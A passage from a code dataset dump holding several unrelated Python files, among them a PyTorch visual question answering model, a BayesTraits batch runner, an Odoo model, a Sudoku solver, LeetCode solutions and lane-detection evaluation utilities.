extra \n\n embedding, attention = feature_embedding_model(*inp)\n \n # out = self.GMNs[i](encoded_feature, text_embedding_total, embedding_phrase_total, )\n # memo = self.MNs[i](encoded_feature, text_embedding_total, embedding_phrase_total) # torch.Size([bs, 2048])\n # memo = self.MNs[i](encoded_feature_512, text_embedding_total) # torch.Size([bs, 2048])\n # print(\"memo:\", memo.size()) \n # print(\"embedding\", embedding.size())\n\n # embedding_memo_superpos = embedding + memo\n # feature_embeddings.append(embedding_memo_superpos)\n # feature_embeddings.append(memo)\n feature_embeddings.append(embedding)\n\n # Concatenate all features embeddings and return along with attention\n feature_embedding_total = torch.cat(feature_embeddings, dim=1)\n\n # print(\"feature_embeddings_tot\", feature_embedding_total.size()) #[bs*4096]\n\n return feature_embedding_total, feature_attentions \n\n def get_optimizer_parameters(self, config):\n combine_layer = self.image_text_multi_modal_combine_layer\n params = [\n {\"params\": self.word_embedding.parameters()},\n {\"params\": self.image_feature_embeddings_list.parameters()},\n {\"params\": self.text_embeddings.parameters()},\n {\"params\": self.mcb.parameters()},\n {\"params\": self.visual_graph.parameters()},\n # {\"params\": self.textual_graph.parameters()},\n {\"params\": combine_layer.parameters()},\n {\"params\": self.classifier.parameters()},\n {\n \"params\": self.image_feature_encoders.parameters(),\n \"lr\": (config.optimizer.params.lr * 0.1),\n },\n ]\n\n return params\n\n def print_sample_list(self, sample_list):\n print (\"=====sample_list=====\")\n print(sample_list.fields())\n for key in sample_list.keys():\n print(key+\":\")\n # print(type(sample_list[key]))\n if isinstance(sample_list[key],str) :\n print(\"str:\", sample_list[key])\n elif isinstance(sample_list[key],dict) : # region description: dict\n for key2 in sample_list[key].keys():\n print(\" \"+key2+\":\")\n # if type(sample_list[key][key2]) is np.ndarray:\n # print(sample_list[key][key2].shape)\n # else:\n # print(sample_list[key][key2])\n print(sample_list[key][key2])\n elif isinstance(sample_list[key],list) :\n for i in sample_list[key]: # image info 1: [none, ]\n if i != None:\n print(i.keys(), i.values)\n else: \n print (i)\n else: \n print(sample_list[key].size())\n\n\n def forward(self, sample_list):\n # self.print_sample_list(sample_list)\n\n ## metadata\n bs = len(sample_list.question_id) \n num_regions_vg = []\n for i in range(bs):\n num_regions_vg.append(len(sample_list.region_description[\"region_id\"][i]))\n # print(\"num_regions_vg\", num_regions_vg)\n\n ## question & caption word embedding(word->300D vec)\n # print(\"text\", sample_list.text) #tensor[4,20]\n sample_list.text = self.word_embedding(sample_list.text)\n # print(\"text\", sample_list.text.size()) # torch.Size([4, 20, 300])\n for i in range(bs):\n for j in range (num_regions_vg[i]):\n # [[50,20],[50,20],[49,20][49,20]]\n sample_list.region_description[\"phrase\"][i][j] = torch.tensor(sample_list.region_description[\"phrase\"][i][j]).cuda() #torch.Size([20])\n sample_list.region_description[\"phrase\"][i][j] = self.word_embedding(sample_list.region_description[\"phrase\"][i][j]) #torch.Size([20, 300])\n \n # question & caption GRU embedding\n text_embedding_total, embedding_phrase_total = self.process_text_embedding(sample_list)\n # print(\"text_embedding\", text_embedding_total.size())\n\n # image feat\n image_embedding_total, _ = self.process_feature_embedding(\n \"image\", sample_list, 
text_embedding_total, embedding_phrase_total\n )\n # print(\"img_embedding\", image_embedding_total.size())\n \n if self.inter_model is not None:\n image_embedding_total = self.inter_model(image_embedding_total)\n \n # print(\"image_embedding\", image_embedding_total.size()) # [batch*4096]\n # print(\"text_embedding:\" , image_embedding_total.size()) # [batch*4096]\n\n # print(\"=======memory======\")\n\n # print(\"=====combine layer=====\")\n \n joint_embedding = self.combine_embeddings(\n [\"image\", \"text\"], [image_embedding_total, text_embedding_total]\n )\n\n # print(\"joint_embedding:\", joint_embedding.size()) # [batch*5000]\n\n model_output = {\"scores\": self.calculate_logits(joint_embedding)}\n\n # print(\"model_output:\", model_output['scores'].size())\n # for name, param in self.MNs.named_parameters():\n # print (name, param)\n\n return model_output\n\n","sub_path":"mmf/models/gmn.py","file_name":"gmn.py","file_ext":"py","file_size_in_byte":21716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"96781315","text":"import os\n\npath_to_data = './data/pheno/'\n\n\nif __name__ == '__main__':\n for (dirpath, dirnames, filenames) in os.walk(path_to_data):\n for filename in filenames:\n name = filename[0:-6]\n os.system('nohup ./BayesTraitsV3 ' + name + '.nexus ' + name + '.pheno < config.txt > ' + name + '.out 2>> ' + name + '.out &')\n","sub_path":"bayes_traits/run_bayes_traits.py","file_name":"run_bayes_traits.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"431760526","text":"import time\nimport multiprocessing\nfrom functools import lru_cache\n\n@lru_cache(maxsize=1024)\ndef fib(n):\n if n < 0:\n raise ValueError\n if n < 2:\n return n\n return fib(n-1)+fib(n-2)\n \ndef fibonacci(n):\n start = time.time()\n res = fib(n)\n end = time.time()\n return res\n \ndef main():\n start = time.time()\n for i in range(30, 37):\n res = fibonacci(i)\n end = time.time() \n print(\"fib(%3d) = %7d (took %0.3fs)\" % (i, res, (end-start)))\n end = time.time() \n print(\"Total time: %0.3fs\" % (end - start)) \n \nif __name__ == \"__main__\": main()\n","sub_path":"kemptyslots/fib_m.py","file_name":"fib_m.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"487688153","text":"# -*- coding: utf-8 -*-\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import *\nfrom odoo.tools.misc import format_date\nfrom datetime import datetime, timedelta\n\n\nclass ExperimentalAbstractItem(models.AbstractModel):\n _name = 'abstract.experimental.item'\n\n reference_no = fields.Char()\n event_trap = {}\n\n # Sets the Reference No for this record item\n @api.one\n def set_reference_no(self):\n new_ref = ''\n if (not self.reference_no) or (self.reference_no == ''):\n new_ref = self.env['ir.sequence'].next_by_code('experimentation.numbers')\n self.reference_no = new_ref\n return new_ref\n\n @api.model\n def create(self, vals):\n ni = super(ExperimentalAbstractItem, self).create(vals)\n if not ni.reference_no:\n ni.set_reference_no()\n vals['ref_no'] = ni.reference_no\n vals['res_model'] = self._name\n vals['res_id'] = ni.id\n return ni\n\n def copy_item(self, vals={}):\n vals['reference_no'] = self.reference_no\n return vals\n\n @api.one\n def write(self, vals):\n vals = super(ExperimentalAbstractItem, self).write(vals)\n # Should be written to fields now and 
ready to test for events\n        self._run_event_traps()\n        return vals\n\n    @api.one\n    def _set_event_trap(self, event_trap, event_data):\n        # event_trap is a dict at class level, so store the payload under the trap name\n        self.event_trap[event_trap] = event_data\n\n    @api.one\n    def _run_event_traps(self):\n        if 'recalculate' in self.event_trap:\n            self.on_recalculate()\n            self.event_trap['recalculate'] = False\n\n        if 'recording' in self.event_trap:\n            self.on_recording()\n            self.event_trap['recording'] = False\n\n        if 'experimentation' in self.event_trap:\n            self.on_experimentation()\n            self.event_trap['experimentation'] = False\n\n        if 'status' in self.event_trap:\n            self.on_status()\n            self.event_trap['status'] = False\n        return\n\n    @api.one\n    def on_recalculate(self):\n        print('here i am')\n        return\n\n    @api.one\n    def on_recording(self):\n        return\n\n    @api.one\n    def on_experimentation(self):\n        # placeholder handler so the dispatch above cannot fail\n        return\n\n    @api.one\n    def on_status(self):\n        # placeholder handler so the dispatch above cannot fail\n        return\n\n    @api.one\n    def event_recalculate(self):\n        self.event_trap['recalculate'] = True\n        return\n\n    @api.one\n    def event_recording(self):\n        self.event_trap['recording'] = True\n        return\n\n    @api.one\n    def event_experimentation(self):\n        self.event_trap['experimentation'] = True\n        return\n\n    @api.one\n    def event_status(self):\n        self.event_trap['status'] = True\n        return\n","sub_path":"rd_tool/models/old/experimental_item.py","file_name":"experimental_item.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"332681458","text":"# https://leetcode-cn.com/problems/friend-circles/\n\nclass Solution:\n    def findCircleNum(self, M: List[List[int]]) -> int:\n        '''DFS: it is enough to run dfs from each index along the diagonal'''\n        def dfs(visited, i):\n            for j in range(len(M)):\n                if M[i][j] == 1 and j not in visited:\n                    visited.add(j)\n                    dfs(visited, j)\n        visited = set()\n        ret = 0\n        for i in range(len(M)):\n            if i not in visited:\n                dfs(visited, i)\n                ret += 1\n        return ret\n        '''Union-find (disjoint set)'''\n#         self.p = [i for i in range(len(M))]\n#         for i in range(len(M)):\n#             for j in range(len(M)):\n#                 if M[i][j] == 1: self.union(i, j)\n#         res = set()\n#         for i in self.p:\n#             res.add(self.find(i))\n#         return len(res)\n    \n#     def union(self, i, j):\n#         p1 = self.find(i)\n#         p2 = self.find(j)\n#         self.p[p1] = p2\n\n#     def find(self, i):\n#         root = i\n#         while self.p[root] != root:\n#             root = self.p[root]\n#         while self.p[i] != i: # path compression\n#             self.p[i], i = root, self.p[i]\n#         return root\n        '''Union-find v2 - written by myself'''\n        p = [i for i in range(len(M))]\n        def union(i, j):\n            p1 = find(i)\n            p2 = find(j)\n            p[p1] = p2\n        def find(i):\n            root = i\n            while root != p[root]: root = p[root]\n            while i != p[i]: p[i], i = root, p[i]\n            return i\n        for i in range(len(M)):\n            for j in range(len(M)):\n                if M[i][j] == 1: union(i, j)\n        return len(set(find(i) for i in p))","sub_path":"Week_08/Homeworks/547. 朋友圈.py","file_name":"547. 朋友圈.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"564240898","text":"\"\"\"\nThis program implements a solver for the well-known puzzle game Sudoku.\nAnyone interested can try it on an unsolved sudoku of their own.\nOtherwise, it is possible to use the example board provided below.\n\"\"\"\n\nclass SudokuSolver():\n    \"\"\"\n    This class takes a sudoku board as input.\n    The board must be a list of lists. Zeros in this matrix mark the\n    numbers the program needs to find.\n    \"\"\"\n    def __init__(self,board):\n        self.board = board\n\n    def empty_cell(self):\n        \"\"\"\n        Returns the position of the first empty cell found.\n        Returns None if the board is fully occupied.\n        \"\"\"\n        for i in range(len(self.board)):\n            for j in range(len(self.board[0])):\n                if self.board[i][j] == 0:\n                    return [i,j]\n        return None\n\n    def number_check(self,value,loc):\n        \"\"\"\n        Checks if a value is valid for this position.\n        Looks through the row, the column and the 3x3 block of the\n        given cell.\n\n        Returns:\n            True in case of validity\n            False otherwise.\n        \"\"\"\n        for i in range(len(self.board[0])): #Check row\n            if self.board[loc[0]][i] == value and i != loc[1]:\n                return False\n\n        for j in range(len(self.board)): #Check column\n            if self.board[j][loc[1]] == value and j != loc[0]:\n                return False\n\n        block_x = loc[1] // 3\n        block_y = loc[0] // 3\n        for y in range(block_y * 3, block_y * 3 + 3):#Check 3x3 block\n            for x in range(block_x * 3, block_x * 3 + 3):\n                if self.board[y][x] == value and [y,x] != loc:\n                    return False\n\n        return True\n    \n    def sudoku_show(self):\n        \"\"\"\n        Prints the sudoku board.\n        \"\"\"\n        for i in range(len(self.board)):\n            if i%3 == 0 and i != 0:\n                print(\"- - - - - - - - - -\")\n            for j in range(len(self.board[i])):\n                if j%3 == 0 and j != 0:\n                    print(\"|\",end = \"\")\n                if j > 7:\n                    print(self.board[i][j])\n                else:\n                    print(self.board[i][j],end = \" \")\n    \n    def solve(self):\n        \"\"\"\n        Attempts to solve the board by inserting a digit into an empty cell.\n        If the digit fits, the function recurses to fill the next empty cell.\n        When no digit fits, the cell is reset to zero and a new digit is tried.\n\n        Returns:\n            True: all cells are solved correctly.\n            False: the given value is wrong. 
Need to backtrack to the original\n cell.\n \"\"\"\n self.empty = self.empty_cell()\n if not self.empty:\n return True\n\n res = False\n y,x = self.empty\n nums = list(range(1,10))\n\n for n in nums:\n if self.number_check(n,[y,x]):\n self.board[y][x] = n\n if self.solve():\n res = True\n else:\n self.board[y][x] = 0\n res = False\n return res\n\n\nboard1 = [\n [7,8,0,4,0,0,1,2,0],\n [6,0,0,0,7,5,0,0,9],\n [0,0,0,6,0,1,0,7,8],\n [0,0,7,0,4,0,2,6,0],\n [0,0,1,0,5,0,9,3,0],\n [9,0,4,0,6,0,0,0,5],\n [0,7,0,3,0,0,0,1,2],\n [1,2,0,0,0,7,4,0,0],\n [0,4,9,2,0,6,0,0,7]\n]\nboard = [\n [0,7,3,8,0,0,2,9,0],\n [0,0,2,3,0,0,0,0,0],\n [0,0,1,6,0,0,0,0,0],\n [0,6,0,7,0,3,1,8,0],\n [0,0,0,0,0,0,0,0,5],\n [0,3,0,0,0,1,7,2,0],\n [9,1,0,0,0,0,0,5,3],\n [3,8,0,1,0,0,0,7,2],\n [0,0,0,0,3,0,6,0,0]\n]\n\n\nif __name__ == '__main__':\n sud = SudokuSolver(board)\n print('Starting board')\n print('\\n')\n sud.sudoku_show()\n print('--------------------')\n print('\\n')\n print('Solved board')\n print('\\n')\n sud.solve()\n sud.sudoku_show()\n","sub_path":"sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"49849237","text":"from typing import Optional\n\n\ndef _define_numerical_dict(dict_: Optional[dict]) -> Optional[dict]:\n \"\"\"\n Takes a dictionary and checks if all values in dictionary are integers and floats.\n Can take None as argument.\n\n Args:\n the_dict: Dict to perform check against\n\n Raises:\n ValueError: If all values of dict are not int or float\n TypeError: When argument type is not dict\n\n Returns:\n None or the dict\n \"\"\"\n\n if not dict_:\n dict_ = dict_\n\n elif isinstance(dict_, dict):\n if not all([isinstance(x, (float, int)) for x in dict_.values()]):\n raise ValueError(\"All values in the dictionary must be integer or float\")\n\n else:\n raise TypeError(\"The parameter can only take a dictionary or None\")\n\n return dict_\n","sub_path":"feature_engine/parameter_checks.py","file_name":"parameter_checks.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"425714147","text":"import random\n\nimport numpy as np\nimport pickle\nfrom cv2 import polylines, circle\nfrom scipy.optimize import linear_sum_assignment\nfrom sklearn.metrics import classification_report\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\ndef sigmoid(value):\n if -value > np.log(np.finfo(type(value)).max):\n return 0.0\n a = np.exp(-value)\n return 1.0/ (1.0 + a)\n\ndef plot_redy_line(x,y, config):\n y_f = y\n # y_f, x_t = x.copy(), y_f.copy() # for ratoation\n x_t = np.array(x)* config.img_h\n y_f = np.array(y_f)* config.img_h\n return x_t, y_f\n\ndef iterate_and_validate_predictions_cells(prediction, gt, cfg):\n\n y_tr_roc = []\n y_pr_roc = []\n error = []\n\n for i, s in enumerate(prediction):\n for a in s:\n a_pre, b_pre, c_pre, conf, = a\n\n x = np.arange(-cfg.grich_anchor_pt, cfg.grich_anchor_pt, 1 / cfg.num_of_samples)\n conf_true = gt[i, k, l, a, -1]\n\n if conf_true:\n y_tr_roc.append(True)\n a_pre = a_pre * cfg.a_range + cfg.a_shift\n b_pre = b_pre * cfg.b_range + cfg.b_shift\n c_pre = c_pre * cfg.c_range + cfg.c_shift\n y_f = np.round(a_pre * x ** 2 + b_pre * x + c_pre)\n error.append((y_f - gt[i, k, l, a, :-1])**2) ## square error\n else:\n y_tr_roc.append(False)\n\n conf = sigmoid(conf)\n y_pr_roc.append(conf)\n\n y_tr_roc = np.asarray(y_tr_roc)\n 
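# y_tr_roc holds per-anchor ground-truth flags and y_pr_roc the matching\n    # sigmoid confidences, so both arrays can be fed straight into ROC-style\n    # metrics such as class_report below.\n    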
y_pr_roc = np.asarray(y_pr_roc)\n error = np.asarray(error)\n\n return y_tr_roc, y_pr_roc, error\n\ndef class_report(y_tr_roc, y_pr_class, threshold):\n y_pr_class = y_pr_class.copy()\n for i,s in enumerate(y_pr_class):\n if s >= threshold:\n y_pr_class[i] = True\n else:\n y_pr_class[i] = False\n print(classification_report(y_tr_roc, y_pr_class))\n\ndef rgb_color(a):\n if a == 0:\n return (255,0,0)\n if a == 1:\n return (0,255,0)\n if a == 2:\n return (0,0,255)\n\ndef plot_image(pred, config, with_print= False):\n filename_cent = config.DIR + config.experiment_name + '/cluster_cent.sav'\n cluster_cent = pickle.load(open(filename_cent, 'rb'))\n plot_image = np.zeros((config.img_w, config.img_w), dtype=np.float32)\n if with_print:\n print('-----------------------New Prediction---------------------------------------')\n for a in range(config.num_prediction_cells):\n a_ko, b, c,min_x,mid_x, max_x, conf = pred[a, :]\n # sc = sigmoid(sc)\n conf = sigmoid(conf)\n\n\n if conf >= config.conf_thr:\n\n a_ko = a_ko #* config.a_range + config.a_shift\n b = b #* config.b_range + config.b_shift\n c = c #* config.c_range + config.c_shift\n x_pred = np.array([min_x,mid_x, max_x])\n y_f = np.array([a_ko,b, c])\n #y_f = a_ko * x_pred ** 2 + b * x_pred + c\n y_f, x_t = plot_redy_line(y_f, x_pred, config)\n y_f = y_f + cluster_cent[a][0]\n x_t = x_t + cluster_cent[a][1]\n\n #y_f = y_f + config.img_h //2\n #x_t = x_t + config.img_h //2\n f = np.array([x_t, y_f]).T\n\n\n if with_print:\n #print('Score ' + ' a: ' + str(a_ko) + ' b: ' + str(b) + ' c: ' + str(c) + ' conf: ' + str(\n # conf)+ 'min: ' +str(min_x)+ 'max: ' +str(max_x)) # + ' Fit correct:' + str(fit_t) + ' Fit wrong:' + str(fit_f))\n print(' conf: ' + str(conf)+ 'min: ' +str(x_t[0])+ 'max: ' +str(x_t[-1])) # + ' Fit correct:' + str(fit_t) + ' Fit wrong:' + str(fit_f))\n plot_image = polylines(plot_image, np.int32([f]), 0, 1, thickness=1)\n #plot_image = circle(plot_image, (int(x_t[0]), 100) , 3, (1, 1, 1), thickness=1, lineType=8,\n # shift=0)\n #plot_image = circle(plot_image, (int(x_t[-1]), 100), 10, (1, 1, 1), thickness=1, lineType=8,\n # shift=0)\n # plot_image = circle(plot_image, (y_f[2], x_t[2]), 6, (1, 1, 1), thickness=1, lineType=8,\n # shift=0)\n if with_print:\n print('----------------------------------------------------------------------------')\n\n return plot_image\n\ndef plot_image3d(grid, config, is_prediction, with_print= False):\n x = np.arange(-config.grich_anchor_pt, config.grich_anchor_pt, 1 / config.num_of_samples)\n\n fig = plt.figure()\n if is_prediction:\n fig.canvas.set_window_title('Prediction')\n else:\n fig.canvas.set_window_title('Ground_Truth')\n ax = fig.gca(projection='3d')\n # ax.grid(True)\n\n grid_test = np.arange(0, config.img_w, 16)\n ax.set_xticks(grid_test, minor=False)\n ax.set_yticks(grid_test, minor=False)\n # ax.set_yticks(grid_test, minor=True)\n ax.xaxis.grid(True, which='major')\n ax.yaxis.grid(True, which='major')\n #ax.set_zticks(grid_test, minor=False)\n\n # count ground thruth\n counter_gt = 0\n # count pred\n counter_pred = 0\n\n if with_print:\n print('-----------------------New Prediction---------------------------------------')\n\n for k in range(0, config.grid_size):\n for l in range(0, config.grid_size):\n for a in range(config.num_prediction_cells):\n if is_prediction:\n\n a_ko, b, c, conf = grid[k, l, a, :]\n conf = sigmoid(conf)\n\n if conf >= config.conf_thr:\n a_ko = a_ko * config.a_range + config.a_shift\n b = b * config.b_range + config.b_shift\n c = c * config.c_range + config.c_shift\n 
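# a_ko, b and c come out of the network normalized; the range/shift factors\n                        # from the config map them back to real parabola coefficients.\n                        # Note that conf was already passed through sigmoid once above.\n                        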
conf = sigmoid(conf)\n\n y_fill = np.round(a_ko * x ** 2 + b * x + c)\n x_t, y_fill = plot_redy_line(x, y_fill, l, k, config)\n f = np.array([x_t, y_fill]).T\n\n plot_image = np.zeros((config.img_w, config.img_w), dtype=np.float32)\n if with_print:\n print('Score ' + ' a: ' + str(a_ko) + ' b: ' + str(b) + ' c: ' + str(c) + ' conf: ' + str(\n conf)) # + ' Fit correct:' + str(fit_t) + ' Fit wrong:' + str(fit_f))\n\n plot_image = polylines(plot_image, np.int32([f]), 0, 1, thickness=1)\n indices = np.where(plot_image != 0)\n z = np.ones_like(indices[1]) * a\n ax.plot(indices[1], indices[0], z, label='parametric curve')\n # ax.legend()\n #ax.plot(all_lines[1][1], all_lines[1][0], all_lines[1][2]) # , projection='3d')\n counter_pred += 1\n else:\n if grid[k, l, a,-1]:\n x_t, y_f = plot_redy_line(x, grid[k, l, a,:-1], l, k, config)\n z = np.ones_like(x_t) * a\n ax.plot(y_f, x_t, z, label='parametric curve')\n counter_gt += 1\n #ax.legend()\n print('Ground thruth counted: ' + str(counter_gt))\n print('Prediction counted: ' + str(counter_pred))\n if with_print:\n print('----------------------------------------------------------------------------')\n\n return 0\n\ndef iou(line1, line2):\n # assume that the line1 and 2 are [0, 1] images\n sum_line1 = np.sum(line1) # with assumption sum is just only a count\n sum_line2 = np.sum(line2)\n inter_sum = np.sum(line1 *line2)\n union_sum = sum_line1 + sum_line2 - inter_sum\n if union_sum == 0.:\n return 0.\n else:\n return np.divide(inter_sum, union_sum)# return the iou\n\ndef ev_iou_based_assignment(row_ind, col_ind, assignment_matrix, gt_grid_index, pred_grid_index, iou_thr, cfg):\n new_gt_grid_index = []\n new_pred_grid_index = []\n for row_io, col_io in zip(row_ind, col_ind):\n if assignment_matrix[row_io, col_io] >= iou_thr:\n new_pred_grid_index.append(row_io)\n new_gt_grid_index.append(col_io)\n\n TP = len(new_pred_grid_index)\n FP = len(pred_grid_index) - TP\n FN = len(gt_grid_index) - TP\n\n precission = np.divide(TP, (TP + FP))\n recall = np.divide(TP, (TP + FN))\n prod = precission * recall\n sum_prec_rc = precission + recall\n f1 = np.divide(2*(prod), sum_prec_rc)\n\n # for debug reason plot matched gridbox\n if 0:\n not_matched_gt = [x for x in range(len(gt_grid_index)) if x not in new_gt_grid_index] # look for not matched indexs\n not_matched_pred = [x for x in range(len(pred_grid_index)) if x not in new_pred_grid_index] # look for not matched indexs\n plotgrid_gt = np.zeros((cfg.grid_size, cfg.grid_size, 1), dtype=np.float32)\n plotgrid_assigned = np.zeros((cfg.grid_size, cfg.grid_size, cfg.num_prediction_cells), dtype=np.float32)\n f, axarr = plt.subplots(1, 2)\n for k in not_matched_gt:\n r, c = gt_grid_index[k][:2]\n plotgrid_gt[r, c] = 1\n axarr[0].imshow(plotgrid_gt[:, :, 0], cmap='gray') # only for debug\n axarr[0].set_title('FN', color='0.7')\n\n for k in not_matched_pred:\n r, c = pred_grid_index[k][:2]\n plotgrid_assigned[r, c] = 1\n axarr[1].imshow(plotgrid_assigned[:, :, 0], cmap='gray') # only for debug\n axarr[1].set_title('FP', color='0.7')\n##\n for s in row_ind:\n r, c ,a=pred_grid_index[s][0:3]\n plotgrid_assigned[r, c] = 1\n axarr[1].imshow(plotgrid_assigned[:, :, 0], cmap='gray') # only for debug\n axarr[1].set_title('Predicted assigment', color='0.7')\n\n plt.show()\n\n return [precission, recall, f1] ,[TP, FP, FN]\n\ndef grid_based_eval_with_iou(gt, pred, cfg, conf_thr= .51, debug = False):\n x = np.arange(-cfg.grich_anchor_pt, cfg.grich_anchor_pt, 1 / cfg.num_of_samples)\n\n\n gt_grid_index = []\n pred_grid_index = []\n 
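# Each ground-truth and predicted lane is rasterized with polylines into a\n    # binary mask so pairwise IoU can be computed; linear_sum_assignment on\n    # (1 - IoU) then gives the optimal one-to-one matching between them.\n    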
gt_image_list = []\n # go through gt save all lines as list\n for k in range(0, cfg.grid_size):\n for l in range(0, cfg.grid_size):\n for a in range(cfg.num_prediction_cells):\n if gt[k, l, a, -1]:\n\n x_t, y_f = plot_redy_line(x, gt[k, l, a, :-1], l, k ,cfg)\n f = np.array([x_t, y_f]).T\n # here are only the y values, the x values are linear from -anchor point to anchor point\n gt_grid_index.append([k, l, a])\n gt_image = np.zeros((cfg.img_w, cfg.img_h),\n dtype=np.float32) # row # col https://en.wikipedia.org/wiki/Index_notation\n gt_image = polylines(gt_image, np.int32([f]), 0, 1, thickness=cfg.thickness_of_lanes)\n gt_image_list.append(gt_image)\n\n assignment_row = [] # this will be the assignment matrix\n for k in range(0, cfg.grid_size):\n for l in range(0, cfg.grid_size):\n for a in range(cfg.num_prediction_cells):\n\n a_pre, b_pre, c_pre, conf = pred[k, l, a, :]\n conf = sigmoid(conf)\n\n if conf >= conf_thr:\n pred_grid_index.append([k, l, a])\n assignment_col = []\n\n a_pre = a_pre * cfg.a_range + cfg.a_shift\n b_pre = b_pre * cfg.b_range + cfg.b_shift\n c_pre = c_pre * cfg.c_range + cfg.c_shift\n\n pred_image = np.zeros((cfg.img_w, cfg.img_h), dtype=np.float32)\n y_fill = np.round(a_pre * x ** 2 + b_pre * x + c_pre)\n\n x_t, y_fill = plot_redy_line(x, y_fill, l, k, cfg)\n\n f2 = np.array([x_t, y_fill]).T\n pred_image = polylines(pred_image, np.int32([f2]), 0, 1, thickness=cfg.thickness_of_lanes)\n\n for gt_img in gt_image_list:\n assignment_col.append(iou(gt_img, pred_image))\n assignment_row.append(assignment_col)\n\n assignment_matrix = 1 - np.asarray(assignment_row)\n if assignment_matrix.ndim == 2:\n row_ind, col_ind = linear_sum_assignment(assignment_matrix)\n assignment_matrix = 1 - assignment_matrix\n # for debug reason plot matched gridbox\n if debug:\n plotgrid_gt = np.zeros((cfg.grid_size, cfg.grid_size, 1), dtype=np.float32)\n plotgrid_assigned = np.zeros((cfg.grid_size, cfg.grid_size, 1), dtype=np.float32)\n f, axarr = plt.subplots(1, 2)\n for k in range(0, cfg.grid_size):\n for l in range(0, cfg.grid_size):\n for a in range(cfg.num_prediction_cells):\n if gt[k, l, a, -1]:\n plotgrid_gt[k, l] = 1\n axarr[0].imshow(plotgrid_gt[:, :, 0], cmap='gray') # only for debug\n axarr[0].set_title('Ground Thruth', color='0.7')\n\n for s in row_ind:\n r, c=pred_grid_index[s][0:2]\n plotgrid_assigned[r, c] = 1\n axarr[1].imshow(plotgrid_assigned[:, :, 0], cmap='gray') # only for debug\n axarr[1].set_title('Predicted assigment', color='0.7')\n\n plt.show()\n\n small = ev_iou_based_assignment(row_ind, col_ind, assignment_matrix, gt_grid_index, pred_grid_index, cfg.small_iou_Thr, cfg)\n medium = ev_iou_based_assignment(row_ind, col_ind, assignment_matrix, gt_grid_index, pred_grid_index, cfg.medium_iou_Thr, cfg)\n big = ev_iou_based_assignment(row_ind, col_ind, assignment_matrix, gt_grid_index, pred_grid_index, cfg.big_iou_Thr, cfg)\n # count for coefidenz matrix\n return small, medium, big\n else:\n return None\n\ndef nms(pred, cfg):\n x = np.arange(-cfg.grich_anchor_pt, cfg.grich_anchor_pt, 1 / cfg.num_of_samples)\n\n # pred_grid_index = []\n pred_grid_image_list = []\n # go through gt save all lines as list\n for k in range(0, cfg.grid_size):\n for l in range(0, cfg.grid_size):\n for a in range(cfg.num_prediction_cells):\n a_pre, b_pre, c_pre, conf = pred[k, l, a, :]\n conf = sigmoid(conf)\n\n if conf >= cfg.conf_thr:\n a_pre = a_pre * cfg.a_range + cfg.a_shift\n b_pre = b_pre * cfg.b_range + cfg.b_shift\n c_pre = c_pre * cfg.c_range + cfg.c_shift\n\n pred_image = 
np.zeros((cfg.img_w, cfg.img_h), dtype=np.float32)\n                    y_fill = np.round(a_pre * x ** 2 + b_pre * x + c_pre)\n                    x_t, y_fill = plot_redy_line(x, y_fill, l, k, cfg)\n                    f = np.array([x_t, y_fill]).T\n                    pred_image = polylines(pred_image, np.int32([f]), 0, 1, thickness=cfg.thickness_of_lanes)\n\n                    pred_grid_image_list.append([k, l, a, conf, pred_image])\n\n    pred_grid_image_list.sort(key=lambda b: b[3], reverse=True)  # sort by conf for nms\n\n    length_pred = len(pred_grid_image_list)\n    for i in range(length_pred):\n        pred_i = pred_grid_image_list[i]\n        for j in range(i + 1, length_pred):\n            boxj = pred_grid_image_list[j]\n            if iou(pred_i[-1], boxj[-1]) > cfg.nms_iou_thrs:\n                pred[boxj[0], boxj[1], boxj[2]].fill(0.)\n                # boxj.c = 0.0\n\n    return pred","sub_path":"Validation/validation_utils_lane_only.py","file_name":"validation_utils_lane_only.py","file_ext":"py","file_size_in_byte":15306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"34549709","text":"class Solution:\n    def flipAndInvertImage(self, A):\n        \"\"\"\n        :type A: List[List[int]]\n        :rtype: List[List[int]]\n        \"\"\"\n        out = []\n        for line in A:\n            out.append([0 if i else 1 for i in reversed(line)])\n        return out\n\nprint(Solution().flipAndInvertImage([[1,1,0,0],[1,0,0,1],[0,1,1,1],[1,0,1,0]]))","sub_path":"flipAndInverImage.py","file_name":"flipAndInverImage.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"193159099","text":"from tqdm import tqdm\nfrom skimage import morphology, io\nimport cv2\nimport os\nimport numpy as np\nimport UtilTools.common\n\n\nclass Image_processing:\n    def __init__(self):\n        self.c = UtilTools.common.Common()\n\n    def smooth_histogram(self, _path: str):\n        \"\"\"\n        Performs histogram equalization (smoothing).\n        :param _path: Path of the image to equalize.\n        :return:\n        \"\"\"\n        img = cv2.imread(_path, 2)\n        hist, bins = np.histogram(img.flatten(), img.max() + 1, [0, img.max()])\n        cdf = hist.cumsum()\n        cdf_normalized = cdf * hist.max() / cdf.max()\n        cdf_m = np.ma.masked_equal(cdf, 0)\n        cdf_m = (cdf_m - cdf_m.min()) * img.max() / (cdf_m.max() - cdf_m.min())\n        cdf = np.ma.filled(cdf_m, 0).astype('uint16')\n\n        img2 = cdf[img]\n        # output_fol = '/'.join(_path.split('/')[0:-1]) + '/smoothed'\n        # if self.c.folder_check(output_fol):\n        #     output_img = ''.join(_path.split('/')[-1].split('.')[0:-1]) + '_smoothed.png'\n        #     cv2.imwrite(os.path.join(output_fol, '/' + output_img), img2)\n        return img2\n\n    def 